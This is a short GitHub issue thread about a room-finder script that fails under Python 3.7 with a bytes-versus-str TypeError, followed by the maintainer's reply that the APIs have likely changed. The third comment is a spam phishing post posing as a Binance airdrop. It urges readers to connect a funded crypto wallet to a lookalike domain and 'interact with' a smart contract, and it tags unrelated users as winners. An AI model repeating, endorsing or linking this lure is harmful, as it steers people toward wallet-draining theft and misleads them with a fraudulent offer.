### ISSUE TITLE
Not working anymore

### ISSUE THREAD

**Issue by PaulRBerg** [eonlight/roomfinder#2]
This is what I get if I run the scripts in the README:

```
Room Finder v0.2.0 (c) Ruben de Campos
2019-01-15 19:24:12,352 - SpareRoom - load_rooms - No such file or directory
Traceback (most recent call last):
  File "rooms.py", line 576, in <module>
    main()
  File "rooms.py", line 573, in main
    spareroom.generate_report(fields=settings.FIELDS, max_range=settings.MAX_RESULTS)
  File "rooms.py", line 164, in generate_report
    f.write(html.encode('utf-8'))
TypeError: write() argument must be str, not bytes
```

Using Python 3.7.1

**Comment by eonlight** [comment]
Hey Paul, the last time I used this was more than 2 years ago, it is likely that the APIs have changed.

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @pakholeung37, @5oclockshadow, @paydaylight, @nemetoo, @axiommer, @vince-lynch, @tortuvshin
